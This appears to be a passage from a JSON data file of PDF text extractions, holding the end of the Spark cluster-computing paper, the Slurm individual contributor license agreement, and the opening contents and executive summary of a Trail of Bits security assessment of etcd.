to the workers\nonly once instead of packaging it with every closure.\nSpark lets the programmer create a “broadcast vari-\n3Local reductions are first performed at each node, however.\n2able” object that wraps the value and ensures that it is\nonly copied to each worker once.\n•Accumulators : These are variables that workers can\nonly “add” to using an associative operation, and that\nonly the driver can read. They can be used to im-\nplement counters as in MapReduce and to provide a\nmore imperative syntax for parallel sums. Accumu-\nlators can be defined for any type that has an “add”\noperation and a “zero” value. Due to their “add-only”\nsemantics, they are easy to make fault-tolerant.\n3 Examples\nWe now show some sample Spark programs. Note that we\nomit variable types because Scala supports type inference.\n3.1 Text Search\nSuppose that we wish to count the lines containing errors\nin a large log file stored in HDFS. This can be imple-\nmented by starting with a file dataset object as follows:\nval file = spark.textFile(\"hdfs://...\")\nval errs = file.filter(_.contains(\"ERROR\"))\nval ones = errs.map(_ => 1)\nval count = ones.reduce(_+_)\nWe first create a distributed dataset called file that\nrepresents the HDFS file as a collection of lines. We trans-\nform this dataset to create the set of lines containing “ER-\nROR” ( errs ), and then map each line to a 1 and add up\nthese ones using reduce . The arguments to filter,map and\nreduce are Scala syntax for function literals.\nNote that errs andones are lazy RDDs that are never\nmaterialized. Instead, when reduce is called, each worker\nnode scans input blocks in a streaming manner to evaluate\nones , adds these to perform a local reduce, and sends its\nlocal count to the driver. When used with lazy datasets in\nthis manner, Spark closely emulates MapReduce.\nWhere Spark differs from other frameworks is that it\ncan make some of the intermediate datasets persist across\noperations. For example, if wanted to reuse the errs\ndataset, we could create a cached RDD from it as follows:\nval cachedErrs = errs.cache()\nWe would now be able to invoke parallel operations on\ncachedErrs or on datasets derived from it as usual, but\nnodes would cache partitions of cachedErrs in memory\nafter the first time they compute them, greatly speeding\nup subsequent operations on it.\n3.2 Logistic Regression\nThe following program implements logistic regression\n[3], an iterative classification algorithm that attempts to\nfind a hyperplane wthat best separates two sets of points.\nThe algorithm performs gradient descent: it starts wat a\nrandom value, and on each iteration, it sums a function ofwover the data to move win a direction that improves it.\nIt thus benefits greatly from caching the data in memory\nacross iterations. We do not explain logistic regression in\ndetail, but we use it to show a few new Spark features.\n// Read points from a text file and cache them\nval points = spark.textFile(...)\n.map(parsePoint).cache()\n// Initialize w to random D-dimensional vector\nvar w = Vector.random(D)\n// Run multiple iterations to update w\nfor (i <- 1 to ITERATIONS) {\nval grad = spark.accumulator(new Vector(D))\nfor (p <- points) { // Runs in parallel\nval s = (1/(1+exp(-p.y *(w dot p.x)))-1) *p.y\ngrad += s *p.x\n}\nw -= grad.value\n}\nFirst, although we create an RDD called points , we\nprocess it by running a for loop over it. The for key-\nword in Scala is syntactic sugar for invoking the foreach\nmethod of a collection with the loop body as a closure.\nThat is, the code for(p <- points) {body }is equiv-\nalent to points.foreach(p => {body }). Therefore,\nwe are invoking Spark’s parallel foreach operation.\nSecond, to sum up the gradient, we use an accumulator\nvariable called gradient (with a value of type V ector ).\nNote that the loop adds to gradient using an overloaded\n+=operator. The combination of accumulators and for\nsyntax allows Spark programs to look much like impera-\ntive serial programs. Indeed, this example differs from a\nserial version of logistic regression in only three lines.\n3.3 Alternating Least Squares\nOur final example is an algorithm called alternating least\nsquares (ALS). ALS is used for collaborative filtering\nproblems, such as predicting users’ ratings for movies that\nthey have not seen based on their movie rating history (as\nin the Netflix Challenge). Unlike our previous examples,\nALS is CPU-intensive rather than data-intensive.\nWe briefly sketch ALS and refer the reader to [27] for\ndetails. Suppose that we wanted to predict the ratings of u\nusers for mmovies, and that we had a partially filled ma-\ntrixRcontaining the known ratings for some user-movie\npairs. ALS models Ras the product of two matrices M\nandUof dimensions m×kandk×urespectively; that\nis, each user and each movie has a k-dimensional “feature\nvector” describing its characteristics, and a user’s rating\nfor a movie is the dot product of its feature vector and the\nmovie’s. ALS solves for MandUusing the known rat-\nings and then computes M×Uto predict the unknown\nones. This is done using the following iterative process:\n1. Initialize Mto a random value.\n2. Optimize Ugiven Mto minimize error on R.\n33. Optimize Mgiven Uto minimize error on R.\n4. Repeat steps 2 and 3 until convergence.\nALS can be parallelized by updating different users /\nmovies on each node in steps 2 and 3. However, because\nall of the steps use R, it is helpful to make Ra broadcast\nvariable so that it does not get re-sent to each node on each\nstep. A Spark implementation of ALS that does is shown\nbelow. Note that we parallelize the collection 0 until u\n(a Scala range object) and collect it to update each array:\nval Rb = spark.broadcast(R)\nfor (i <- 1 to ITERATIONS) {\nU = spark.parallelize(0 until u)\n.map(j => updateUser(j, Rb, M))\n.collect()\nM = spark.parallelize(0 until m)\n.map(j => updateUser(j, Rb, U))\n.collect()\n}\n4 Implementation\nSpark is built on top of Mesos [16, 15], a “cluster operat-\ning system” that lets multiple parallel applications share\na cluster in a fine-grained manner and provides an API\nfor applications to launch tasks on a cluster. This allows\nSpark to run alongside existing cluster computing frame-\nworks, such as Mesos ports of Hadoop and MPI, and share\ndata with them. In addition, building on Mesos greatly re-\nduced the programming effort that had to go into Spark.\nThe core of Spark is the implementation of resilient dis-\ntributed datasets. As an example, suppose that we define\na cached dataset called cachedErrs representing error\nmessages in a log file, and that we count its elements us-\ningmap andreduce , as in Section 3.1:\nval file = spark.textFile(\"hdfs://...\")\nval errs = file.filter(_.contains(\"ERROR\"))\nval cachedErrs = errs.cache()\nval ones = cachedErrs.map(_ => 1)\nval count = ones.reduce(_+_)\nThese datasets will be stored as a chain of objects cap-\nturing the lineage of each RDD, shown in Figure 1. Each\ndataset object contains a pointer to its parent and informa-\ntion about how the parent was transformed.\nInternally, each RDD object implements the same sim-\nple interface, which consists of three operations:\n•getPartitions , which returns a list of partition IDs.\n•getIterator(partition) , which iterates over a partition.\n•getPreferredLocations(partition) , which is used for\ntask scheduling to achieve data locality.\nWhen a parallel operation is invoked on a dataset, Spark\ncreates a taskto process each partition of the dataset and\nsends these tasks to worker nodes. We try to send each\nHdfsTextFile path = hdfs://… file: \nFilteredDataset func = _.contains(…) errs: \nCachedDataset cachedErrs: \nMappedDataset func = _ => 1 ones: \nFigure 1: Lineage chain for the distributed dataset objects de-\nfined in the example in Section 4.\ntask to one of its preferred locations using a technique\ncalled delay scheduling [26]. Once launched on a worker,\neach task calls getIterator to start reading its partition.\nThe different types of RDDs differ only in how they\nimplement the RDD interface. For example, for a Hdfs-\nTextFile , the partitions are block IDs in HDFS, their pre-\nferred locations are the block locations, and getIterator\nopens a stream to read a block. In a MappedDataset , the\npartitions and preferred locations are the same as for the\nparent, but the iterator applies the map function to ele-\nments of the parent. Finally, in a CachedDataset , the\ngetIterator method looks for a locally cached copy of a\ntransformed partition, and each partition’s preferred loca-\ntions start out equal to the parent’s preferred locations, but\nget updated after the partition is cached on some node to\nprefer reusing that node. This design makes faults easy to\nhandle: if a node fails, its partitions are re-read from their\nparent datasets and eventually cached on other nodes.\nFinally, shipping tasks to workers requires shipping\nclosures to them—both the closures used to define a dis-\ntributed dataset, and closures passed to operations such as\nreduce . To achieve this, we rely on the fact that Scala clo-\nsures are Java objects and can be serialized using Java se-\nrialization; this is a feature of Scala that makes it relatively\nstraightforward to send a computation to another machine.\nScala’s built-in closure implementation is not ideal, how-\never, because we have found cases where a closure object\nreferences variables in the closure’s outer scope that are\nnot actually used in its body. We have filed a bug report\nabout this, but in the meantime, we have solved the issue\nby performing a static analysis of closure classes’ byte-\ncode to detect these unused variables and set the corre-\nsponding fields in the closure object to null . We omit\nthe details of this analysis due to lack of space.\nShared Variables: The two types of shared variables in\nSpark, broadcast variables and accumulators, are imple-\nmented using classes with custom serialization formats.\nWhen one creates a broadcast variable bwith a value v,\nvis saved to a file in a shared file system. The serialized\nform of bis a path to this file. When b’s value is queried\n4on a worker node, Spark first checks whether vis in a\nlocal cache, and reads it from the file system if it isn’t.\nWe initially used HDFS to broadcast variables, but we are\ndeveloping a more efficient streaming broadcast system.\nAccumulators are implemented using a different “se-\nrialization trick.” Each accumulator is given a unique ID\nwhen it is created. When the accumulator is saved, its\nserialized form contains its ID and the “zero” value for\nits type. On the workers, a separate copy of the accu-\nmulator is created for each thread that runs a task using\nthread-local variables, and is reset to zero when a task be-\ngins. After each task runs, the worker sends a message to\nthe driver program containing the updates it made to var-\nious accumulators. The driver applies updates from each\npartition of each operation only once to prevent double-\ncounting when tasks are re-executed due to failures.\nInterpreter Integration: Due to lack of space, we only\nsketch how we have integrated Spark into the Scala inter-\npreter. The Scala interpreter normally operates by com-\npiling a class for each line typed by the user. This class\nincludes a singleton object that contains the variables or\nfunctions on that line and runs the line’s code in its con-\nstructor. For example, if the user types var x = 5 fol-\nlowed by println(x) , the interpreter defines a class (say\nLine1 ) containing xand causes the second line to com-\npile to println(Line1.getInstance().x) . These\nclasses are loaded into the JVM to run each line. To make\nthe interpreter work with Spark, we made two changes:\n1. We made the interpreter output the classes it defines\nto a shared filesystem, from which they can be loaded\nby the workers using a custom Java class loader.\n2. We changed the generated code so that the singleton\nobject for each line references the singleton objects\nfor previous lines directly, rather than going through\nthe static getInstance methods. This allows clo-\nsures to capture the current state of the singletons they\nreference whenever they are serialized to be sent to a\nworker. If we had not done this, then updates to the\nsingleton objects (e.g., a line setting x = 7 in the ex-\nample above) would not propagate to the workers.\n5 Results\nAlthough our implementation of Spark is still at an early\nstage, we relate the results of three experiments that show\nits promise as a cluster computing framework.\nLogistic Regression: We compared the performance of\nthe logistic regression job in Section 3.2 to an implemen-\ntation of logistic regression for Hadoop, using a 29 GB\ndataset on 20 “m1.xlarge” EC2 nodes with 4 cores each.\nThe results are shown in Figure 2. With Hadoop, each\niteration takes 127s, because it runs as an independent\nMapReduce job. With Spark, the first iteration takes 174s\n(likely due to using Scala instead of Java), but subsequent\n0 1000 2000 3000 4000 1 5 10 20 30 Running Time (s) Number of Iterations Hadoop Spark Figure 2: Logistic regression performance in Hadoop and Spark.\niterations take only 6s, each because they reuse cached\ndata. This allows the job to run up to 10x faster.\nWe have also tried crashing a node while the job was\nrunning. In the 10-iteration case, this slows the job down\nby 50s (21%) on average. The data partitions on the\nlost node are recomputed and cached in parallel on other\nnodes, but the recovery time was rather high in the cur-\nrent experiment because we used a high HDFS block size\n(128 MB), so there were only 12 blocks per node and the\nrecovery process could not utilize all cores in the cluster.\nSmaller block sizes would yield faster recovery times.\nAlternating Least Squares: We have implemented the\nalternating least squares job in Section 3.3 to measure the\nbenefit of broadcast variables for iterative jobs that copy\na shared dataset to multiple nodes. We found that without\nusing broadcast variables, the time to resend the ratings\nmatrix Ron each iteration dominated the job’s running\ntime. Furthermore, with a na ¨ıve implementation of broad-\ncast (using HDFS or NFS), the broadcast time grew lin-\nearly with the number of nodes, limiting the scalability of\nthe job. We implemented an application-level multicast\nsystem to mitigate this. However, even with fast broad-\ncast, resending Ron each iteration is costly. Caching R\nin memory on the workers using a broadcast variable im-\nproved performance by 2.8x in an experiment with 5000\nmovies and 15000 users on a 30-node EC2 cluster.\nInteractive Spark: We used the Spark interpreter to\nload a 39 GB dump of Wikipedia in memory across 15\n“m1.xlarge” EC2 machines and query it interactively. The\nfirst time the dataset is queried, it takes roughly 35 sec-\nonds, comparable to running a Hadoop job on it. How-\never, subsequent queries take only 0.5 to 1 seconds, even\nif they scan all the data. This provides a qualitatively dif-\nferent experience, comparable to working with local data.\n6 Related Work\nDistributed Shared Memory: Spark’s resilient dis-\ntributed datasets can be viewed as an abstraction for dis-\ntributed shared memory (DSM), which has been studied\nextensively [20]. RDDs differ from DSM interfaces in\ntwo ways. First, RDDs provide a much more restricted\n5programming model, but one that lets datasets be rebuilt\nefficiently if cluster nodes fail. While some DSM systems\nachieve fault tolerance through checkpointing [18], Spark\nreconstructs lost partitions of RDDs using lineage infor-\nmation captured in the RDD objects. This means that only\nthe lost partitions need to be recomputed, and that they\ncan be recomputed in parallel on different nodes, without\nrequiring the program to revert to a checkpoint. In addi-\ntion, there is no overhead if no nodes fail. Second, RDDs\npush computation to the data as in MapReduce [11], rather\nthan letting arbitrary nodes access a global address space.\nOther systems have also restricted the DSM program-\nming model to improve performance, reliability and pro-\ngrammability. Munin [8] lets programmers annotate vari-\nables with the access pattern they will have so as to choose\nan optimal consistency protocol for them. Linda [13] pro-\nvides a tuple space programming model that may be im-\nplemented in a fault-tolerant fashion. Thor [19] provides\nan interface to persistent shared objects.\nCluster Computing Frameworks: Spark’s parallel op-\nerations fit into the MapReduce model [11]. However,\nthey operate on RDDs that can persist across operations.\nThe need to extend MapReduce to support iterative jobs\nwas also recognized by Twister [6, 12], a MapReduce\nframework that allows long-lived map tasks to keep static\ndata in memory between jobs. However, Twister does not\ncurrently implement fault tolerance. Spark’s abstraction\nof resilient distributed datasets is both fault-tolerant and\nmore general than iterative MapReduce. A Spark program\ncan define multiple RDDs and alternate between running\noperations on them, whereas a Twister program has only\none map function and one reduce function. This also\nmakes Spark useful for interactive data analysis, where\na user can define several datasets and then query them.\nSpark’s broadcast variables provide a similar facility to\nHadoop’s distributed cache [2], which can disseminate a\nfile to all nodes running a particular job. However, broad-\ncast variables can be reused across parallel operations.\nLanguage Integration: Spark’s language integration is\nsimilar to that of DryadLINQ [25], which uses .NET’s\nsupport for language integrated queries to capture an ex-\npression tree defining a query and run it on a cluster.\nUnlike DryadLINQ, Spark allows RDDs to persist in\nmemory across parallel operations. In addition, Spark\nenriches the language integration model by supporting\nshared variables (broadcast variables and accumulators),\nimplemented using classes with custom serialized forms.\nWe were inspired to use Scala for language integration\nby SMR [14], a Scala interface for Hadoop that uses clo-\nsures to define map and reduce tasks. Our contributions\nover SMR are shared variables and a more robust imple-\nmentation of closure serialization (described in Section 4).\nFinally, IPython [22] is a Python interpreter for scien-tists that lets users launch computations on a cluster using\na fault-tolerant task queue interface or low-level message\npassing interface. Spark provides a similar interactive in-\nterface, but focuses on data-intensive computations.\nLineage: Capturing lineage or provenance information\nfor datasets has long been a research topic in the scien-\ntific computing an database fields, for applications such\nas explaining results, allowing them to be reproduced by\nothers, and recomputing data if a bug is found in a work-\nflow step or if a dataset is lost. We refer the reader to [7],\n[23] and [9] for surveys of this work. Spark provides a re-\nstricted parallel programming model where fine-grained\nlineage is inexpensive to capture, so that this information\ncan be used to recompute lost dataset elements.\n7 Discussion and Future Work\nSpark provides three simple data abstractions for pro-\ngramming clusters: resilient distributed datasets (RDDs),\nand two restricted types of shared variables: broadcast\nvariables and accumulators. While these abstractions are\nlimited, we have found that they are powerful enough to\nexpress several applications that pose challenges for exist-\ning cluster computing frameworks, including iterative and\ninteractive computations. Furthermore, we believe that\nthe core idea behind RDDs, of a dataset handle that has\nenough information to (re)construct the dataset from data\navailable in reliable storage, may prove useful in develop-\ning other abstractions for programming clusters.\nIn future work, we plan to focus on four areas:\n1. Formally characterize the properties of RDDs and\nSpark’s other abstractions, and their suitability for var-\nious classes of applications and workloads.\n2. Enhance the RDD abstraction to allow programmers\nto trade between storage cost and re-construction cost.\n3. Define new operations to transform RDDs, including\na “shuffle” operation that repartitions an RDD by a\ngiven key. Such an operation would allow us to im-\nplement group-bys and joins.\n4. Provide higher-level interactive interfaces on top of\nthe Spark interpreter, such as SQL and R [4] shells.\n8 Acknowledgements\nWe thank Ali Ghodsi for his feedback on this paper. This\nresearch was supported by California MICRO, Califor-\nnia Discovery, the Natural Sciences and Engineering Re-\nsearch Council of Canada, as well as the following Berke-\nley RAD Lab sponsors: Sun Microsystems, Google, Mi-\ncrosoft, Amazon, Cisco, Cloudera, eBay, Facebook, Fu-\njitsu, HP, Intel, NetApp, SAP, VMware, and Yahoo!.\nReferences\n[1] Apache Hive. http://hadoop.apache.org/hive.\n6[2] Hadoop Map/Reduce tutorial. http://hadoop.apache.org/\ncommon/docs/r0.20.0/mapred tutorial.html.\n[3] Logistic regression – Wikipedia.\nhttp://en.wikipedia.org/wiki/Logistic regression.\n[4] The R project for statistical computing.\nhttp://www.r-project.org.\n[5] Scala programming language. http://www.scala-lang.org.\n[6] Twister: Iterative MapReduce.\nhttp://iterativemapreduce.org.\n[7] R. Bose and J. Frew. Lineage retrieval for scientific data\nprocessing: a survey. ACM Computing Surveys , 37:1–28,\n2005.\n[8] J. B. Carter, J. K. Bennett, and W. Zwaenepoel.\nImplementation and performance of Munin. In SOSP ’91 .\nACM, 1991.\n[9] J. Cheney, L. Chiticariu, and W.-C. Tan. Provenance in\ndatabases: Why, how, and where. Foundations and Trends\nin Databases , 1(4):379–474, 2009.\n[10] C. T. Chu, S. K. Kim, Y . A. Lin, Y . Yu, G. R. Bradski,\nA. Y . Ng, and K. Olukotun. Map-reduce for machine\nlearning on multicore. In NIPS ’06 , pages 281–288. MIT\nPress, 2006.\n[11] J. Dean and S. Ghemawat. MapReduce: Simplified data\nprocessing on large clusters. Commun. ACM ,\n51(1):107–113, 2008.\n[12] J. Ekanayake, S. Pallickara, and G. Fox. MapReduce for\ndata intensive scientific analyses. In ESCIENCE ’08 ,\npages 277–284, Washington, DC, USA, 2008. IEEE\nComputer Society.\n[13] D. Gelernter. Generative communication in linda. ACM\nTrans. Program. Lang. Syst. , 7(1):80–112, 1985.\n[14] D. Hall. A scalable language, and a scalable framework.\nhttp://www.scala-blogs.org/2008/09/scalable-language-\nand-scalable.html.\n[15] B. Hindman, A. Konwinski, M. Zaharia, A. Ghodsi, A. D.\nJoseph, R. H. Katz, S. Shenker, and I. Stoica. Mesos: A\nplatform for fine-grained resource sharing in the data\ncenter. Technical Report UCB/EECS-2010-87, EECS\nDepartment, University of California, Berkeley, May\n2010.\n[16] B. Hindman, A. Konwinski, M. Zaharia, and I. Stoica. A\ncommon substrate for cluster computing. In Workshop on\nHot Topics in Cloud Computing (HotCloud) 2009 , 2009.\n[17] M. Isard, M. Budiu, Y . Yu, A. Birrell, and D. Fetterly.\nDryad: Distributed data-parallel programs from sequential\nbuilding blocks. In EuroSys 2007 , pages 59–72, 2007.\n[18] A.-M. Kermarrec, G. Cabillic, A. Gefflaut, C. Morin, and\nI. Puaut. A recoverable distributed shared memory\nintegrating coherence and recoverability. In FTCS ’95 .\nIEEE Computer Society, 1995.\n[19] B. Liskov, A. Adya, M. Castro, S. Ghemawat, R. Gruber,\nU. Maheshwari, A. C. Myers, M. Day, and L. Shrira. Safe\nand efficient sharing of persistent objects in thor. In\nSIGMOD ’96 , pages 318–329. ACM, 1996.\n[20] B. Nitzberg and V . Lo. Distributed shared memory: a\nsurvey of issues and algorithms. Computer , 24(8):52 –60,\naug 1991.\n[21] C. Olston, B. Reed, U. Srivastava, R. Kumar, and\nA. Tomkins. Pig latin: a not-so-foreign language for dataprocessing. In SIGMOD ’08 . ACM, 2008.\n[22] F. P ´erez and B. E. Granger. IPython: a system for\ninteractive scientific computing. Comput. Sci. Eng. ,\n9(3):21–29, May 2007.\n[23] Y . L. Simmhan, B. Plale, and D. Gannon. A survey of\ndata provenance in e-science. SIGMOD Rec. ,\n34(3):31–36, 2005.\n[24] H.-c. Yang, A. Dasdan, R.-L. Hsiao, and D. S. Parker.\nMap-reduce-merge: simplified relational data processing\non large clusters. In SIGMOD ’07 , pages 1029–1040.\nACM, 2007.\n[25] Y . Yu, M. Isard, D. Fetterly, M. Budiu, ´U. Erlingsson,\nP. K. Gunda, and J. Currey. DryadLINQ: A system for\ngeneral-purpose distributed data-parallel computing using\na high-level language. In OSDI ’08 , San Diego, CA, 2008.\n[26] M. Zaharia, D. Borthakur, J. Sen Sarma, K. Elmeleegy,\nS. Shenker, and I. Stoica. Delay scheduling: A simple\ntechnique for achieving locality and fairness in cluster\nscheduling. In EuroSys 2010 , April 2010.\n[27] Y . Zhou, D. Wilkinson, R. Schreiber, and R. Pan.\nLarge-scale parallel collaborative filtering for the Netflix\nprize. In AAIM ’08 , pages 337–348, Berlin, Heidelberg,\n2008. Springer-Verlag.\n7" } ]
{ "category": "Orchestration & Management", "file_name": "Slurm_Individual.pdf", "project_name": "Slurm", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Slurm Workload Manager Individual Contributor License Agreement\nThank you for your interest in contributing to Slurm Workload Manager (\"We\" or \"Us\").\nThis contributor agreement (\"Agreement\") documents the rights granted by contributors to Us. To\nmake this document effective, please sign it and send it to Us by email, following the instructions at\nhttp://www.schedmd.com/slurmdocs/contributor.html. This is a legally binding document, so please\nread it carefully before agreeing to it. The Agreement may cover more than one software project\nmanaged by Us.\n1. Definitions\n\"You\" means the individual who Submits a Contribution to Us.\n\"Contribution\" means any work of authorship that is Submitted by You to Us in which You own\nor assert ownership of the Copyright. If You do not own the Copyright in the entire work of\nauthorship, please follow the instructions in\nhttp://www.schedmd.com/slurmdocs/contributor.html.\n\"Copyright\" means all rights protecting works of authorship owned or controlled by You,\nincluding copyright, moral and neighboring rights, as appropriate, for the full term of their\nexistence including any extensions by You.\n\"Material\" means the work of authorship which is made available by Us to third parties. When\nthis Agreement covers more than one software project, the Material means the work of authorship\nto which the Contribution was Submitted. After You Submit the Contribution, it may be included\nin the Material.\n\"Submit\" means any form of electronic, verbal, or written communication sent to Us or our\nrepresentatives, including but not limited to electronic mailing lists, source code control systems,\nand issue tracking systems that are managed by, or on behalf of, Us for the purpose of discussing\nand improving the Material, but excluding communication that is conspicuously marked or\notherwise designated in writing by You as \"Not a Contribution.\"\n\"Submission Date\" means the date on which You Submit a Contribution to Us.\n\"Effective Date\" means the date You execute this Agreement or the date You first Submit a\nContribution to Us, whichever is earlier.\n\"Media\" means any portion of a Contribution which is not software.\n2. Grant of Rights\n2.1 Copyright License\n(a) You retain ownership of the Copyright in Your Contribution and have the same rights to use or\nlicense the Contribution which You would have had without entering into the Agreement.\n(b) To the maximum extent permitted by the relevant law, You grant to Us a perpetual, worldwide,\nnon-exclusive, transferable, royalty-free, irrevocable license under the Copyright covering the\nContribution, with the right to sublicense such rights through multiple tiers of sublicensees, to\nreproduce, modify, display, perform and distribute the Contribution as part of the Material; provided\nthat this license is conditioned upon compliance with Section 2.3.\n1 of 3\nHarmony (HA-CLA-I) Version 1.02.2 Patent License\nFor patent claims including, without limitation, method, process, and apparatus claims which You\nown, control or have the right to grant, now or in the future, You grant to Us a perpetual, worldwide,\nnon-exclusive, transferable, royalty-free, irrevocable patent license, with the right to sublicense these\nrights to multiple tiers of sublicensees, to make, have made, use, sell, offer for sale, import and\notherwise transfer the Contribution and the Contribution in combination with the Material (and\nportions of such combination). This license is granted only to the extent that the exercise of the\nlicensed rights infringes such patent claims; and provided that this license is conditioned upon\ncompliance with Section 2.3.\n2.3 Outbound License\nAs a condition on the grant of rights in Sections 2.1 and 2.2, We agree to license the Contribution only\nunder the terms of the license or licenses which We are using on the Submission Date for the Material\n(including any rights to adopt any future version of a license if permitted).\nIn addition, We may use the following licenses for Media in the Contribution: (including any right to\nadopt any future version of a license if permitted).\n2.4 Moral Rights. If moral rights apply to the Contribution, to the maximum extent permitted by law,\nYou waive and agree not to assert such moral rights against Us or our successors in interest, or any of\nour licensees, either direct or indirect.\n2.5 Our Rights. You acknowledge that We are not obligated to use Your Contribution as part of the\nMaterial and may decide to include any Contribution We consider appropriate.\n2.6 Reservation of Rights. Any rights not expressly assigned or licensed under this section are\nexpressly reserved by You.\n3. Agreement\nYou confirm that:\n(a) You have the legal authority to enter into this Agreement.\n(b) You own the Copyright and patent claims covering the Contribution which are required to grant\nthe rights under Section 2.\n(c) The grant of rights under Section 2 does not violate any grant of rights which You have made to\nthird parties, including Your employer. If You are an employee, You have had Your employer approve\nthis Agreement or sign the Entity version of this document. If You are less than eighteen years old,\nplease have Your parents or guardian sign the Agreement.\n(d) You have followed the instructions in http://www.schedmd.com/slurmdocs/contributor.html, if You\ndo not own the Copyright in the entire work of authorship Submitted.\n4. Disclaimer\nEXCEPT FOR THE EXPRESS WARRANTIES IN SECTION 3, THE CONTRIBUTION IS\nPROVIDED \"AS IS\". MORE PARTICULARLY, ALL EXPRESS OR IMPLIED WARRANTIES\nINCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTY OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT ARE EXPRESSLY\nDISCLAIMED BY YOU TO US AND BY US TO YOU. TO THE EXTENT THAT ANY SUCH\n2 of 3\nHarmony (HA-CLA-I) Version 1.0WARRANTIES CANNOT BE DISCLAIMED, SUCH WARRANTY IS LIMITED IN DURATION \nTO THE MINIMUM PERIOD PERMITTED BY L AW.\n5. Consequential Damage Waiver\nTO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE L AW, IN NO EVENT WILL \nYOU OR US BE LIABLE FOR ANY LOSS OF PROFITS, LOSS OF ANTICI PATED SAVINGS, \nLOSS OF D ATA, INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL AND EXEMPLA RY \nDAMAGES ARISING OUT OF THIS AGREEMENT REGARDLESS OF THE LEGAL OR \nEQUITABLE THEORY (CONTRAC T, TORT OR OTHERWISE) UPON WHICH THE CLAIM IS \nBASED.\n6. Miscellaneous\n6.1 This Agreement will be governed by and construed in accordance with the laws of Utah County, \nUtah, USA excluding its conflicts of law provisions. Under certain circumstances, the governing law \nin this section might be superseded by the United Nations Convention on Contracts for the \nInternational Sale of Goods (\"UN Convention\") and the parties intend to avoid the application of the \nUN Convention to this Agreement and, thus, exclude the application of the UN Convention in its \nentirety to this Agreement.\n6.2 This Agreement sets out the entire agreement between You and Us for Your Contributions to Us \nand overrides all other agreements or understandings.\n6.3 If You or We assign the rights or obligations received through this Agreement to a third part y, as a \ncondition of the assignment, that third party must agree in writing to abide by all the rights and \nobligations in the Agreement.\n6.4 The failure of either party to require performance by the other party of any provision of this \nAgreement in one situation shall not affect the right of a party to require such performance at any time \nin the future. A waiver of performance under a provision in one situation shall not be considered a \nwaiver of the performance of the provision in the future or a waiver of the provision in its entiret y.\n6.5 If any provision of this Agreement is found void and unenforceable, such provision will be \nreplaced to the extent possible with a provision that comes closest to the meaning of the original \nprovision and which is enforceable. The terms and conditions set forth in this Agreement shall apply \nnotwithstanding any failure of essential purpose of this Agreement or any limited remedy to the \nmaximum extent possible under la w.\nYou\n________________________\nName: __________________\nAddress: ________________\n________________________\nUs\n________________________\nName: __________________\nTitle: ___________________\nAddress: ________________\n________________________\n3 of 3\nHarmony (HA-CLA-I) Version 1.0" } ]
{ "category": "Orchestration & Management", "file_name": "SECURITY_AUDIT.pdf", "project_name": "etcd", "subcategory": "Coordination & Service Discovery" }
[ { "data": " \ne t c d\n \nS e c u r i t y A s s e s s m e n t\n \nFebruary 7, 2020\n \n \nPrepared For:\n \n \nXiang Li | ​\netcd\n \n \nxiangli.cs@gmail.com\n \n \n \nChris Aniszczyk | ​\nLinux Foundation\n \n \ncaniszczyk@linuxfoundation.org\n \n \n \nPrepared By:\n \n \nRobert Tonic | ​\nTrail of Bits\n \nrobert.tonic@trailofbits.com\n \n \n \nDominik Czarnota | ​\nTrail of Bits\n \ndominik.czarnota@trailofbits.com\n \n \n \nSai Vegasena | ​\nTrail of Bits\n \nsai.vegasena@trailofbits.com\n \n \n \nKristin Mayo | ​\nTrail of Bits\n \nkristin.mayo@trailofbits.com\n \n \n \nChange Log:\n \nApril 14, 2020: Corrected typo in finding difficulties.\n \nMay 11, 2020: Corrected severity inconsistency.\n \nJuly 22, 2020: Added ​\nAppendix D: Gateway Finding Remediations​\n.\n \nAugust 04, 2020: Updated executive summary to highlight Appendix D.\n \n  \n \nExecutive Summary\n \nProject Dashboard\n \nEngagement Goals\n \nCoverage\n \nRecommendations Summary\n \nShort Term\n \nLong Term\n \nFindings Summary\n \n1. Gateway TLS endpoint validation only confirms TCP reachability\n \n2. The gateway can include itself as an endpoint, resulting in resource exhaustion\n \n3. Directories created via os.MkdirAll are not checked for permissions\n \n4. Gateway TLS authentication only applies to endpoints detected in DNS SRV records\n \n5. TOCTOU of gateway endpoint authentication\n \n6. An entry with large index causes panic in WAL.ReadAll method\n \n7. A large slice causes panic in decodeRecord method\n \n8. No minimum password length\n \n9. Inaccurate logging of authentication attempts for users with CN-based auth only\n \n10. The “Total number of db keys compacted” metric is never changed\n \n11. Auto compaction retention can be set to negative value causing a compaction loop\n \nor a crash\n \n12. User credentials are stored in WAL logs in plaintext\n \n13. Null pointer exception when calling wal.ReadAll after wal.Create\n \n14. Submitting a -1 for cluster node size results in an index out-of-bound panic during\n \nservice discovery\n \n15. Insecure ciphers are allowed by default\n \n16. etcd is insecure by default\n \n17. Use of TLS InsecureSkipVerify\n \nA. Vulnerability Classifications\n \nB. Code Quality Recommendations\n \nC. Fuzzing results\n \netcd wal package\n \nD. Gateway Finding Remediations\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 1\n \n E x e c u t i v e S u m m a r y\n \nFrom January 21 through January 31, 2020, the Linux Foundation engaged Trail of Bits to\n \nreview the security of etcd. Trail of Bits conducted this assessment over the course of four\n \nperson-weeks with four engineers working from release 3.4.3 of the ​\netcd-io/etcd\n \nrepository.\n \n \nIn the first week of the assessment, Trail of Bits set up local environments for building and\n \ntesting the etcd system. During this time, we performed a mixture of manual and\n \nautomated review. Automated review consisted of running various static analysis tools,\n \nsuch as ​\nerrcheck\n​\n, ​\nineffassign\n​\n, and ​\ngo-sec\n​\n. Results were subsequently reviewed and\n \ntriaged as necessary. Manual review focused on gaining familiarity with the implementation\n \ndetails of etcd, such as configuration options, default settings, service discovery, RAFT\n \nconsensus, and leader election.\n \n \nDuring the second week, we continued our manual review with the same targets, plus\n \ncoverage of the etcd proxy and gateway. We also began instrumenting custom tooling. On\n \nthe automated side, ​\ngoogle/gofuzz\n​\n and ​\ndvyukov/go-fuzz\n​\n testing harnesses were\n \ndeveloped to test the WAL file implementation (see ​\nAppendix C. Fuzzing results​\n).\n \n \nOur assessment revealed a total of 17 findings ranging from high- to informational-severity.\n \nOverall, the etcd codebase represents a mature and heavily adopted product. However,\n \nthere are many edge-cases not caught by the current test suite, and there are areas where\n \nthe expected functionality of etcd does not match its implementation. These gaps can\n \naffect the security posture of the system since etcd 